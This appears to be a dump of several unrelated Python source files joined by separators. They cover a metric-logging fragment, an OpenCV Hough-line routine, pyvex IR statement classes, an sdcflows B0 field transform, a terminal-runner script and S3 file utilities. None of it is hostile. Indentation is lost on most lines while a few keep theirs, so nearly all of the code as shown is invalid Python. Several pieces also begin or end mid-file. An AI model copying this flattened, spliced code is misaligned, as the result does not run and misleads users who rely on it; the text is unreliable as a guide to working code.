        ss = (outputs - Y).norm(2).div(outputs.norm(2)).item()
        sss = abs(torch.max(outputs - Y).item()) / abs(torch.max(outputs).item())
print("error_1: %.8f, error_2: %.8f, error_3: %.8f, error_4: %.8f, error_5: %.8f, error_6: %.8f"
% (d, dd, ddd, s, ss, sss))
with open(os.path.join('WANTED_PATH' + str(args.num) + '.txt'), 'a') as f: #you need to modify the code here to get it running
f.write(str(d))
f.write(' ')
f.write(str(dd))
f.write(' ')
f.write(str(ddd))
f.write(' ')
f.write(str(s))
f.write(' ')
f.write(str(ss))
f.write(' ')
f.write(str(sss))
f.write('\n')
'''
|
python
|
import cv2
import numpy as np
from util import *
from copy import deepcopy
def get_horizontal_lines (img):
#=====[ Step 1: set parameters ]=====
num_peaks = 5
theta_buckets_horz = [-90, -89]
    theta_resolution_horz = 0.0175  # radians
rho_resolution_horz = 6
threshold_horz = 5
#=====[ Step 2: find lines in (rho, theta) ]=====
# [H, theta, rho] = hough (corners_img, 'Theta', theta_buckets_horz, 'RhoResolution', rho_resolution_horz);
# peaks = houghpeaks(H, num_peaks);
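    # cv2.HoughLines returns lines in (rho, theta) form, where
    # rho = x*cos(theta) + y*sin(theta) is the signed distance from the
    # origin and theta is the angle of the line's normal, in radians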
lines_rt = cv2.HoughLines (deepcopy(img), rho_resolution_horz, theta_resolution_horz, threshold_horz)[0]
    print(lines_rt)
#####[ DEBUG: draw lines in (rho, theta) ]#####
img = draw_lines_rho_theta (img , lines_rt)
cv2.imshow ('HORIZONTAL LINES', img)
key = 0
while key != 27:
key = cv2.waitKey (30)
#=====[ Step 3: convert peaks to rho, theta ]=====
# theta_rad = fromDegrees ('radians', theta);
# rhos = rho(peaks(:, 1));
# thetas = theta_rad(peaks(:, 2));
# lines = [rhos; thetas];
#=====[ Step 4: figure out which lines they are ]=====
# indexed_lines = horizontal_ransac (lines);
#####[ DEBUG: show lines ]#####
# draw_lines (corners_img, indexed_lines(1:2, :));
def get_vertical_lines (img):
pass
if __name__ == "__main__":
    corners_img_name = './IPC/corners.png'
    corners_img = cv2.cvtColor(cv2.imread(corners_img_name), cv2.COLOR_BGR2GRAY)
#=====[ Step 2: get horizontal/vertical lines, along with indices up to a shift ]=====
    horizontal_lines = get_horizontal_lines(corners_img)
# vertical_lines = get_vertical_lines (corners_img);
|
python
|
from . import VEXObject
class IRStmt(VEXObject):
"""
    IR statements in VEX represent operations with side effects.
"""
__slots__ = ['arch', 'tag']
def __init__(self, c_stmt, irsb):
VEXObject.__init__(self)
self.arch = irsb.arch
# self.c_stmt = c_stmt
self.tag = ints_to_enums[c_stmt.tag]
def pp(self):
        print(self.__str__())
@property
def expressions(self):
expressions = []
for k in self.__slots__:
v = getattr(self, k)
if isinstance(v, IRExpr):
expressions.append(v)
expressions.extend(v.child_expressions)
return expressions
@property
def constants(self):
return sum((e.constants for e in self.expressions), [])
@staticmethod
def _translate(c_stmt, irsb):
if c_stmt[0] == ffi.NULL:
return None
tag = c_stmt.tag
try:
stmt_class = _tag_to_class[tag]
except KeyError:
raise PyVEXError('Unknown/unsupported IRStmtTag %s\n' % ints_to_enums[tag])
return stmt_class(c_stmt, irsb)
class NoOp(IRStmt):
"""
A no-operation statement. It is usually the result of an IR optimization.
"""
def __init__(self, c_stmt, irsb): # pylint:disable=unused-argument
IRStmt.__init__(self, c_stmt, irsb)
def __str__(self):
return "IR-NoOp"
class IMark(IRStmt):
"""
An instruction mark. It marks the start of the statements that represent a single machine instruction (the end of
those statements is marked by the next IMark or the end of the IRSB). Contains the address and length of the
instruction.
"""
__slots__ = ['addr', 'len', 'delta']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = c_stmt.Ist.IMark.addr
self.len = c_stmt.Ist.IMark.len
self.delta = c_stmt.Ist.IMark.delta
def __str__(self):
return "------ IMark(0x%x, %d, %d) ------" % (self.addr, self.len, self.delta)
class AbiHint(IRStmt):
"""
An ABI hint, provides specific information about this platform's ABI.
"""
__slots__ = ['base', 'len', 'nia']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.base = IRExpr._translate(c_stmt.Ist.AbiHint.base, irsb)
self.len = c_stmt.Ist.AbiHint.len
self.nia = IRExpr._translate(c_stmt.Ist.AbiHint.nia, irsb)
def __str__(self):
return "====== AbiHint(0x%s, %d, %s) ======" % (self.base, self.len, self.nia)
class Put(IRStmt):
"""
Write to a guest register, at a fixed offset in the guest state.
"""
__slots__ = ['data', 'offset']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.data = IRExpr._translate(c_stmt.Ist.Put.data, irsb)
self.offset = c_stmt.Ist.Put.offset
def __str__(self):
return "PUT(%s) = %s" % (self.arch.translate_register_name(self.offset, self.data.result_size/8), self.data)
class PutI(IRStmt):
"""
Write to a guest register, at a non-fixed offset in the guest state.
"""
__slots__ = ['descr', 'ix', 'data', 'bias']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.descr = IRRegArray(c_stmt.Ist.PutI.details.descr)
self.ix = IRExpr._translate(c_stmt.Ist.PutI.details.ix, irsb)
self.data = IRExpr._translate(c_stmt.Ist.PutI.details.data, irsb)
self.bias = c_stmt.Ist.PutI.details.bias
def __str__(self):
return "PutI(%s)[%s,%d] = %s" % (self.descr, self.ix, self.bias, self.data)
class WrTmp(IRStmt):
"""
Assign a value to a temporary. Note that SSA rules require each tmp is only assigned to once. IR sanity checking
will reject any block containing a temporary which is not assigned to exactly once.
"""
__slots__ = ['data', 'tmp']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.data = IRExpr._translate(c_stmt.Ist.WrTmp.data, irsb)
self.tmp = c_stmt.Ist.WrTmp.tmp
def __str__(self):
return "t%d = %s" % (self.tmp, self.data)
class Store(IRStmt):
"""
    Write a value to memory.
"""
__slots__ = ['addr', 'data', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.Store.addr, irsb)
self.data = IRExpr._translate(c_stmt.Ist.Store.data, irsb)
self.end = ints_to_enums[c_stmt.Ist.Store.end]
@property
def endness(self):
return self.end
def __str__(self):
return "ST%s(%s) = %s" % (self.endness[-2:].lower(), self.addr, self.data)
class CAS(IRStmt):
"""
    An atomic compare-and-swap operation.
"""
__slots__ = ['addr', 'dataLo', 'dataHi', 'expdLo', 'expdHi', 'oldLo', 'oldHi', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.CAS.details.addr, irsb)
self.dataLo = IRExpr._translate(c_stmt.Ist.CAS.details.dataLo, irsb)
self.dataHi = IRExpr._translate(c_stmt.Ist.CAS.details.dataHi, irsb)
self.expdLo = IRExpr._translate(c_stmt.Ist.CAS.details.expdLo, irsb)
self.expdHi = IRExpr._translate(c_stmt.Ist.CAS.details.expdHi, irsb)
self.oldLo = c_stmt.Ist.CAS.details.oldLo
self.oldHi = c_stmt.Ist.CAS.details.oldHi
self.end = ints_to_enums[c_stmt.Ist.CAS.details.end]
@property
def endness(self):
return self.end
def __str__(self):
return "t(%s,%s) = CAS%s(%s :: (%s,%s)->(%s,%s))" % (
self.oldLo, self.oldHi, self.end[-2:].lower(), self.addr, self.expdLo, self.expdHi, self.dataLo, self.dataHi)
class LLSC(IRStmt):
"""
Either Load-Linked or Store-Conditional, depending on STOREDATA. If STOREDATA is NULL then this is a Load-Linked,
else it is a Store-Conditional.
"""
__slots__ = ['addr', 'storedata', 'result', 'result_size', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.LLSC.addr, irsb)
self.storedata = IRExpr._translate(c_stmt.Ist.LLSC.storedata, irsb)
self.result = c_stmt.Ist.LLSC.result
self.end = ints_to_enums[c_stmt.Ist.LLSC.end]
try:
self.result_size = type_sizes[irsb.tyenv.types[self.result]]
except IndexError:
self.result_size = None
@property
def endness(self):
return self.end
def __str__(self):
if self.storedata is None:
return "t%d = LD%s-Linked(%s)" % (self.result, self.end[-2:].lower(), self.addr)
else:
return "t%d = ( ST%s-Cond(%s) = %s )" % (self.result, self.end[-2:].lower(), self.addr, self.storedata)
class MBE(IRStmt):
__slots__ = ['event']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.event = ints_to_enums[c_stmt.Ist.MBE.event]
def __str__(self):
return "MBusEvent-" + self.event
class Dirty(IRStmt):
__slots__ = ['cee', 'guard', 'tmp', 'mFx', 'mAddr', 'mSize', 'nFxState', 'args', 'result_size']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.cee = IRCallee(c_stmt.Ist.Dirty.details.cee)
self.guard = IRExpr._translate(c_stmt.Ist.Dirty.details.guard, irsb)
self.tmp = c_stmt.Ist.Dirty.details.tmp
self.mFx = ints_to_enums[c_stmt.Ist.Dirty.details.mFx]
self.mAddr = IRExpr._translate(c_stmt.Ist.Dirty.details.mAddr, irsb)
self.mSize = c_stmt.Ist.Dirty.details.mSize
self.nFxState = c_stmt.Ist.Dirty.details.nFxState
args = []
for i in range(20):
a = c_stmt.Ist.Dirty.details.args[i]
if a == ffi.NULL:
break
args.append(IRExpr._translate(a, irsb))
self.args = tuple(args)
try:
self.result_size = type_sizes[irsb.tyenv.types[self.tmp]]
except IndexError:
self.result_size = None
def __str__(self):
return "t%s = DIRTY %s %s ::: %s(%s)" % (
self.tmp, self.guard, "TODO(effects)", self.cee, ','.join(str(a) for a in self.args))
@property
def child_expressions(self):
expressions = sum((a.child_expressions for a in self.args), [])
expressions.extend(self.args)
expressions.append(self.guard)
expressions.extend(self.guard.child_expressions)
return expressions
class Exit(IRStmt):
"""
A conditional exit from the middle of an IRSB.
"""
__slots__ = ['guard', 'dst', 'offsIP', 'jk']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.guard = IRExpr._translate(c_stmt.Ist.Exit.guard, irsb)
self.dst = IRConst._translate(c_stmt.Ist.Exit.dst)
self.offsIP = c_stmt.Ist.Exit.offsIP
self.jk = ints_to_enums[c_stmt.Ist.Exit.jk]
@property
def jumpkind(self):
return self.jk
def __str__(self):
return "if (%s) { PUT(%s) = %s; %s }" % (
self.guard, self.arch.translate_register_name(self.offsIP), hex(self.dst.value), self.jumpkind)
@property
def child_expressions(self):
return [self.guard, self.dst] + self.guard.child_expressions
class LoadG(IRStmt):
"""
A guarded load.
"""
__slots__ = ['addr', 'alt', 'guard', 'dst', 'cvt', 'end', 'cvt_types']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.LoadG.details.addr, irsb)
self.alt = IRExpr._translate(c_stmt.Ist.LoadG.details.alt, irsb)
self.guard = IRExpr._translate(c_stmt.Ist.LoadG.details.guard, irsb)
self.dst = c_stmt.Ist.LoadG.details.dst
self.cvt = ints_to_enums[c_stmt.Ist.LoadG.details.cvt]
self.end = ints_to_enums[c_stmt.Ist.LoadG.details.end]
type_in = ffi.new('IRType *')
type_out = ffi.new('IRType *')
pvc.typeOfIRLoadGOp(c_stmt.Ist.LoadG.details.cvt, type_out, type_in)
type_in = ffi.cast('int *', type_in)[0]
type_out = ffi.cast('int *', type_out)[0]
self.cvt_types = (ints_to_enums[type_in], ints_to_enums[type_out])
@property
def endness(self):
return self.end
def __str__(self):
return "t%d = if (%s) %s(LD%s(%s)) else %s" % (
self.dst, self.guard, self.cvt, self.end[-2:].lower(), self.addr, self.alt)
class StoreG(IRStmt):
"""
A guarded store.
"""
__slots__ = ['addr', 'data', 'guard', 'end']
def __init__(self, c_stmt, irsb):
IRStmt.__init__(self, c_stmt, irsb)
self.addr = IRExpr._translate(c_stmt.Ist.StoreG.details.addr, irsb)
self.data = IRExpr._translate(c_stmt.Ist.StoreG.details.data, irsb)
self.guard = IRExpr._translate(c_stmt.Ist.StoreG.details.guard, irsb)
self.end = ints_to_enums[c_stmt.Ist.StoreG.details.end]
@property
def endness(self):
return self.end
def __str__(self):
return "if (%s) ST%s(%s) = %s" % (self.guard, self.end[-2:].lower(), self.addr, self.data)
from .expr import IRExpr
from .const import IRConst
from .enums import IRRegArray, ints_to_enums, enums_to_ints, IRCallee, type_sizes
from .errors import PyVEXError
from . import ffi, pvc
_tag_to_class = {
enums_to_ints['Ist_NoOp']: NoOp,
enums_to_ints['Ist_IMark']: IMark,
enums_to_ints['Ist_AbiHint']: AbiHint,
enums_to_ints['Ist_Put']: Put,
enums_to_ints['Ist_PutI']: PutI,
enums_to_ints['Ist_WrTmp']: WrTmp,
enums_to_ints['Ist_Store']: Store,
enums_to_ints['Ist_LoadG']: LoadG,
enums_to_ints['Ist_StoreG']: StoreG,
enums_to_ints['Ist_CAS']: CAS,
enums_to_ints['Ist_LLSC']: LLSC,
enums_to_ints['Ist_Dirty']: Dirty,
enums_to_ints['Ist_MBE']: MBE,
enums_to_ints['Ist_Exit']: Exit,
}
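

# --- Usage sketch (not part of the original module) ---
# A hedged example of how these statement classes are typically reached,
# assuming the public pyvex/archinfo APIs; the bytes below are a
# hypothetical x86-64 NOP.
#
#   import pyvex, archinfo
#   irsb = pyvex.IRSB(b'\x90', 0x400000, archinfo.ArchAMD64())
#   for stmt in irsb.statements:
#       stmt.pp()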
|
python
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""The :math:`B_0` unwarping transform formalism."""
from pathlib import Path
import attr
import numpy as np
from scipy import ndimage as ndi
from scipy.sparse import vstack as sparse_vstack, csr_matrix, kron
import nibabel as nb
from bids.utils import listify
@attr.s(slots=True)
class B0FieldTransform:
"""Represents and applies the transform to correct for susceptibility distortions."""
coeffs = attr.ib(default=None)
shifts = attr.ib(default=None, init=False)
def fit(self, spatialimage):
r"""
Generate the interpolation matrix (and the VSM with it).
Implements Eq. :math:`\eqref{eq:1}`, interpolating :math:`f(\mathbf{s})`
for all voxels in the target-image's extent.
"""
# Calculate the physical coordinates of target grid
if isinstance(spatialimage, (str, bytes, Path)):
spatialimage = nb.load(spatialimage)
if self.shifts is not None:
newaff = spatialimage.affine
newshape = spatialimage.shape
if np.all(newshape == self.shifts.shape) and np.allclose(
newaff, self.shifts.affine
):
return
weights = []
coeffs = []
# Generate tensor-product B-Spline weights
for level in listify(self.coeffs):
wmat = grid_bspline_weights(spatialimage, level)
weights.append(wmat)
coeffs.append(level.get_fdata(dtype="float32").reshape(-1))
# Interpolate the VSM (voxel-shift map)
vsm = np.zeros(spatialimage.shape[:3], dtype="float32")
vsm = (np.squeeze(np.vstack(coeffs).T) @ sparse_vstack(weights)).reshape(
vsm.shape
)
# Cache
self.shifts = nb.Nifti1Image(vsm, spatialimage.affine, None)
def apply(
self,
spatialimage,
pe_dir,
ro_time,
order=3,
mode="constant",
cval=0.0,
prefilter=True,
output_dtype=None,
):
"""
Apply a transformation to an image, resampling on the reference spatial object.
Parameters
----------
        spatialimage : `spatialimage`
            The image object containing the data to be resampled in reference
            space
        pe_dir : :obj:`str`
            The ``PhaseEncodingDirection`` metadata value, e.g. ``"j-"``.
        ro_time : :obj:`float`
            The total readout time of the EPI acquisition, in seconds.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : {'constant', 'reflect', 'nearest', 'mirror', 'wrap'}, optional
Determines how the input image is extended when the resamplings overflows
a border. Default is 'constant'.
cval : float, optional
Constant value for ``mode='constant'``. Default is 0.0.
        prefilter : bool, optional
Determines if the image's data array is prefiltered with
a spline filter before interpolation. The default is ``True``,
which will create a temporary *float64* array of filtered values
if *order > 1*. If setting this to ``False``, the output will be
slightly blurred if *order > 1*, unless the input is prefiltered,
i.e. it is the result of calling the spline filter on the original
input.
Returns
-------
resampled : `spatialimage` or ndarray
The data imaged after resampling to reference space.
"""
# Ensure the vsm has been computed
self.fit(spatialimage)
vsm = self.shifts.get_fdata().copy()
# Reverse shifts if reversed blips
if pe_dir.endswith("-"):
vsm *= -1.0
# Generate warp field
pe_axis = "ijk".index(pe_dir[0])
# Map voxel coordinates applying the VSM
ijk_axis = tuple([np.arange(s) for s in vsm.shape])
voxcoords = np.array(np.meshgrid(*ijk_axis, indexing="ij"), dtype="float32")
voxcoords[pe_axis, ...] += vsm * ro_time
# Prepare data
data = np.squeeze(np.asanyarray(spatialimage.dataobj))
output_dtype = output_dtype or data.dtype
# Resample
resampled = ndi.map_coordinates(
data,
voxcoords.reshape(3, -1),
output=output_dtype,
order=order,
mode=mode,
cval=cval,
prefilter=prefilter,
).reshape(spatialimage.shape)
moved = spatialimage.__class__(
resampled, spatialimage.affine, spatialimage.header
)
moved.header.set_data_dtype(output_dtype)
return moved
def to_displacements(self, ro_time, pe_dir):
"""
Generate a NIfTI file containing a displacements field transform compatible with ITK/ANTs.
The displacements field can be calculated following
`Eq. (2) in the fieldmap fitting section
<sdcflows.workflows.fit.fieldmap.html#mjx-eqn-eq%3Afieldmap-2>`__.
Parameters
----------
        ro_time : :obj:`float`
            The total readout time of the EPI acquisition, in seconds.
        pe_dir : :obj:`str`
            The ``PhaseEncodingDirection`` metadata value.
Returns
-------
spatialimage : :obj:`nibabel.nifti.Nifti1Image`
A NIfTI 1.0 object containing the distortion.
"""
from math import pi
from nibabel.affines import voxel_sizes, obliquity
from nibabel.orientations import io_orientation
# Generate warp field
data = self.shifts.get_fdata(dtype="float32").copy()
pe_axis = "ijk".index(pe_dir[0])
pe_sign = -1.0 if pe_dir.endswith("-") else 1.0
pe_size = self.shifts.header.get_zooms()[pe_axis]
data *= pe_sign * ro_time * pe_size
fieldshape = tuple(list(data.shape[:3]) + [3])
# Compose a vector field
field = np.zeros((data.size, 3), dtype="float32")
field[..., pe_axis] = data.reshape(-1)
# If coordinate system is oblique, project displacements through directions matrix
aff = self.shifts.affine
if obliquity(aff).max() * 180 / pi > 0.01:
dirmat = np.eye(4)
dirmat[:3, :3] = aff[:3, :3] / (
voxel_sizes(aff) * io_orientation(aff)[:, 1]
)
field = nb.affines.apply_affine(dirmat, field)
warpnii = nb.Nifti1Image(
field.reshape(fieldshape)[:, :, :, np.newaxis, :], aff, None
)
warpnii.header.set_intent("vector", (), "")
warpnii.header.set_xyzt_units("mm")
return warpnii
def _cubic_bspline(d):
"""Evaluate the cubic bspline at distance d from the center."""
return np.piecewise(
d,
[d < 1.0, d >= 1.0],
[
lambda d: (4.0 - 6.0 * d ** 2 + 3.0 * d ** 3) / 6.0,
lambda d: (2.0 - d) ** 3 / 6.0,
],
)
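# Spot checks for the kernel above: _cubic_bspline(0) == 2/3 and
# _cubic_bspline(1) == 1/6 (both branches agree at d == 1). The cubic
# B-Spline has compact support d < 2, which grid_bspline_weights enforces
# via its ``within_support`` mask before evaluating the kernel.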
def grid_bspline_weights(target_nii, ctrl_nii):
r"""
Evaluate tensor-product B-Spline weights on a grid.
For each of the *N* input samples :math:`(s_1, s_2, s_3)` and *K* control
points or *knots* :math:`\mathbf{k} =(k_1, k_2, k_3)`, the tensor-product
cubic B-Spline kernel weights are calculated:
.. math::
\Psi^3(\mathbf{k}, \mathbf{s}) =
\beta^3(s_1 - k_1) \cdot \beta^3(s_2 - k_2) \cdot \beta^3(s_3 - k_3),
\label{eq:2}\tag{2}
where each :math:`\beta^3` represents the cubic B-Spline for one dimension.
The 1D B-Spline kernel implementation uses :obj:`numpy.piecewise`, and is based on the
closed-form given by Eq. (6) of [Unser1999]_.
By iterating over dimensions, the data samples that fall outside of the compact
support of the tensor-product kernel associated to each control point can be filtered
out and dismissed to lighten computation.
Finally, the resulting weights matrix :math:`\Psi^3(\mathbf{k}, \mathbf{s})`
can be easily identified in Eq. :math:`\eqref{eq:1}` and used as the design matrix
for approximation of data.
Parameters
----------
target_nii : :obj:`nibabel.spatialimages`
        A spatial image object (typically, a :obj:`~nibabel.nifti1.Nifti1Image`)
embedding the target EPI image to be corrected.
Provides the location of the *N* samples (total number of voxels) in the space.
ctrl_nii : :obj:`nibabel.spatialimages`
        A spatial image object (typically, a :obj:`~nibabel.nifti1.Nifti1Image`)
embedding the location of the control points of the B-Spline grid.
The data array should contain a total of :math:`K` knots (control points).
Returns
-------
weights : :obj:`numpy.ndarray` (:math:`K \times N`)
A sparse matrix of interpolating weights :math:`\Psi^3(\mathbf{k}, \mathbf{s})`
for the *N* voxels of the target EPI, for each of the total *K* knots.
This sparse matrix can be directly used as design matrix for the fitting
step of approximation/extrapolation.
"""
shape = target_nii.shape[:3]
ctrl_sp = ctrl_nii.header.get_zooms()[:3]
ras2ijk = np.linalg.inv(ctrl_nii.affine)
origin = nb.affines.apply_affine(ras2ijk, [tuple(target_nii.affine[:3, 3])])[0]
wd = []
for i, (o, n, sp) in enumerate(
zip(origin, shape, target_nii.header.get_zooms()[:3])
):
locations = np.arange(0, n, dtype="float16") * sp / ctrl_sp[i] + o
knots = np.arange(0, ctrl_nii.shape[i], dtype="float16")
distance = np.abs(locations[np.newaxis, ...] - knots[..., np.newaxis])
within_support = distance < 2.0
d_vals, d_idxs = np.unique(distance[within_support], return_inverse=True)
bs_w = _cubic_bspline(d_vals)
weights = np.zeros_like(distance, dtype="float32")
weights[within_support] = bs_w[d_idxs]
wd.append(csr_matrix(weights))
return kron(kron(wd[0], wd[1]), wd[2])
|
python
|
# this is a python script because handling Ctrl+C interrupts in batch
# scripts seems to be impossible
#
# This should always run in the same python that Porcupine uses.
from __future__ import annotations
import subprocess
import sys
import colorama
colorama.init()
prog, directory, command = sys.argv
print(colorama.Fore.BLUE + command + colorama.Fore.RESET)
try:
returncode: int | None = subprocess.call(command, cwd=directory, shell=True)
except KeyboardInterrupt:
# the subprocess should have already printed any traceback or
# whatever it might want to print
# TODO: try to catch the return code in this case as well?
returncode = None
print()
print("-----------------------------")
if returncode == 0:
print("The program completed successfully.")
elif returncode is None:
print("The program was interrupted.")
else:
print(f"The program failed with status {returncode}.")
print("Press Enter to close this window...")
input()
|
python
|
import io
import os
import urllib
import boto3
import botocore
import shutil
import subprocess
import tempfile
from google.protobuf import json_format
from pathlib import Path
from threading import Timer
from urllib.parse import urlparse
class NotReadableError(Exception):
pass
class NotWritableError(Exception):
pass
class ProtobufParseException(Exception):
pass
def make_dir(path, check_empty=False, force_empty=False, use_dirname=False):
"""Make a directory.
Args:
path: path to directory
check_empty: if True, check that directory is empty
force_empty: if True, delete files if necessary to make directory
empty
        use_dirname: if path is a file, use the parent directory as path
Raises:
ValueError if check_empty is True and directory is not empty
"""
directory = path
if use_dirname:
directory = os.path.dirname(path)
if force_empty and os.path.isdir(directory):
shutil.rmtree(directory)
os.makedirs(directory, exist_ok=True)
is_empty = len(os.listdir(directory)) == 0
if check_empty and not is_empty:
raise ValueError(
'{} needs to be an empty directory!'.format(directory))
def get_local_path(uri, download_dir):
"""Convert a URI into a corresponding local path.
If a uri is local, return it. If it's remote, we generate a path for it
within download_dir. For an S3 path of form s3://<bucket>/<key>, the path
is <download_dir>/s3/<bucket>/<key>.
Args:
uri: (string) URI of file
download_dir: (string) path to directory
Returns:
(string) a local path
"""
if uri is None:
return None
parsed_uri = urlparse(uri)
if parsed_uri.scheme == '':
path = uri
elif parsed_uri.scheme == 's3':
path = os.path.join(download_dir, 's3', parsed_uri.netloc,
parsed_uri.path[1:])
    elif parsed_uri.scheme in ['http', 'https']:
        path = os.path.join(download_dir, 'http', parsed_uri.netloc,
                            parsed_uri.path[1:])
    else:
        raise ValueError(
            'Unsupported URI scheme: {}'.format(parsed_uri.scheme))
    return path
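# Example (illustrative): get_local_path('s3://bucket/key.txt', '/tmp/dl')
# returns '/tmp/dl/s3/bucket/key.txt', while a plain local path is
# returned unchanged.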
def sync_dir(src_dir_uri, dest_dir_uri, delete=False):
"""Synchronize a local and remote directory.
Transfers files from source to destination directories so that the
destination has all the source files. If delete is True, also delete
files in the destination to match those in the source directory.
Args:
src_dir_uri: (string) URI of source directory
dest_dir_uri: (string) URI of destination directory
delete: (bool)
"""
command = ['aws', 's3', 'sync', src_dir_uri, dest_dir_uri]
if delete:
command.append('--delete')
subprocess.run(command)
def start_sync(src_dir_uri, dest_dir_uri, sync_interval=600):
"""Start syncing a directory on a schedule.
Calls sync_dir on a schedule.
Args:
src_dir_uri: (string) URI of source directory
dest_dir_uri: (string) URI of destination directory
sync_interval: (int) period in seconds for syncing
"""
def _sync_dir(delete=True):
sync_dir(src_dir_uri, dest_dir_uri, delete=delete)
thread = Timer(sync_interval, _sync_dir)
thread.daemon = True
thread.start()
if urlparse(dest_dir_uri).scheme == 's3':
# On first sync, we don't want to delete files on S3 to match
# the contents of output_dir since there's nothing there yet.
_sync_dir(delete=False)
def download_if_needed(uri, download_dir):
"""Download a file into a directory if it's remote.
If uri is local, there is no need to download the file.
Args:
uri: (string) URI of file
download_dir: (string) local directory to download file into
Returns:
(string) path to local file
Raises:
NotReadableError if URI cannot be read from
"""
if uri is None:
return None
path = get_local_path(uri, download_dir)
make_dir(path, use_dirname=True)
parsed_uri = urlparse(uri)
if parsed_uri.scheme == 's3':
try:
print('Downloading {} to {}'.format(uri, path))
s3 = boto3.client('s3')
s3.download_file(parsed_uri.netloc, parsed_uri.path[1:], path)
except botocore.exceptions.ClientError:
raise NotReadableError('Could not read {}'.format(uri))
elif parsed_uri.scheme in ['http', 'https']:
with urllib.request.urlopen(uri) as response:
with open(path, 'wb') as out_file:
try:
shutil.copyfileobj(response, out_file)
except Exception:
raise NotReadableError('Could not read {}'.format(uri))
else:
not_found = not os.path.isfile(path)
if not_found:
raise NotReadableError('Could not read {}'.format(uri))
return path
def upload_if_needed(src_path, dst_uri):
"""Upload a file if the destination is remote.
If dst_uri is local, there is no need to upload.
Args:
src_path: (string) path to source file
dst_uri: (string) URI of destination for file
Raises:
NotWritableError if URI cannot be written to
"""
if dst_uri is None:
return
if not (os.path.isfile(src_path) or os.path.isdir(src_path)):
raise Exception('{} does not exist.'.format(src_path))
parsed_uri = urlparse(dst_uri)
if parsed_uri.scheme == 's3':
# Strip the leading slash off of the path since S3 does not expect it.
print('Uploading {} to {}'.format(src_path, dst_uri))
if os.path.isfile(src_path):
try:
s3 = boto3.client('s3')
s3.upload_file(src_path, parsed_uri.netloc,
parsed_uri.path[1:])
except Exception:
raise NotWritableError('Could not write {}'.format(dst_uri))
else:
sync_dir(src_path, dst_uri, delete=True)
def file_to_str(file_uri):
"""Download contents of text file into a string.
Args:
file_uri: (string) URI of file
Returns:
(string) with contents of text file
Raises:
NotReadableError if URI cannot be read from
"""
parsed_uri = urlparse(file_uri)
if parsed_uri.scheme == 's3':
with io.BytesIO() as file_buffer:
try:
s3 = boto3.client('s3')
s3.download_fileobj(parsed_uri.netloc, parsed_uri.path[1:],
file_buffer)
return file_buffer.getvalue().decode('utf-8')
except botocore.exceptions.ClientError:
raise NotReadableError('Could not read {}'.format(file_uri))
else:
if not os.path.isfile(file_uri):
raise NotReadableError('Could not read {}'.format(file_uri))
with open(file_uri, 'r') as file_buffer:
return file_buffer.read()
def str_to_file(content_str, file_uri):
"""Writes string to text file.
Args:
content_str: string to write
file_uri: (string) URI of file to write
    Raises:
NotWritableError if file_uri cannot be written
"""
parsed_uri = urlparse(file_uri)
if parsed_uri.scheme == 's3':
bucket = parsed_uri.netloc
key = parsed_uri.path[1:]
with io.BytesIO(bytes(content_str, encoding='utf-8')) as str_buffer:
try:
s3 = boto3.client('s3')
s3.upload_fileobj(str_buffer, bucket, key)
except Exception:
raise NotWritableError('Could not write {}'.format(file_uri))
else:
make_dir(file_uri, use_dirname=True)
with open(file_uri, 'w') as content_file:
content_file.write(content_str)
def load_json_config(uri, message):
"""Load a JSON-formatted protobuf config file.
Args:
uri: (string) URI of config file
message: (google.protobuf.message.Message) empty protobuf message of
to load the config into. The type needs to match the content of
uri.
Returns:
the same message passed as input with fields filled in from uri
Raises:
ProtobufParseException if uri cannot be parsed
"""
try:
return json_format.Parse(file_to_str(uri), message)
except json_format.ParseError:
error_msg = ('Problem parsing protobuf file {}. '.format(uri) +
'You might need to run scripts/compile')
raise ProtobufParseException(error_msg)
def save_json_config(message, uri):
"""Save a protobuf object to a JSON file.
Args:
message: (google.protobuf.message.Message) protobuf message
uri: (string) URI of JSON file to write message to
Raises:
NotWritableError if uri cannot be written
"""
json_str = json_format.MessageToJson(message)
str_to_file(json_str, uri)
# Ensure that RV temp directory exists. We need to use a custom location for
# the temporary directory so it will be mirrored on the host file system which
# is needed for running in a Docker container with limited space on EC2.
RV_TEMP_DIR = '/opt/data/tmp/'
# find explicitly set tempdir
explicit_temp_dir = next(
iter([
os.environ.get(k) for k in ['TMPDIR', 'TEMP', 'TMP'] if k in os.environ
] + [tempfile.tempdir]))
try:
# try to create directory
if not os.path.exists(explicit_temp_dir):
os.makedirs(explicit_temp_dir, exist_ok=True)
# can we interact with directory?
explicit_temp_dir_valid = (os.path.isdir(explicit_temp_dir) and Path.touch(
Path(os.path.join(explicit_temp_dir, '.can_touch'))))
except Exception:
print('Root temporary directory cannot be used: {}. Using root: {}'.format(
explicit_temp_dir, RV_TEMP_DIR))
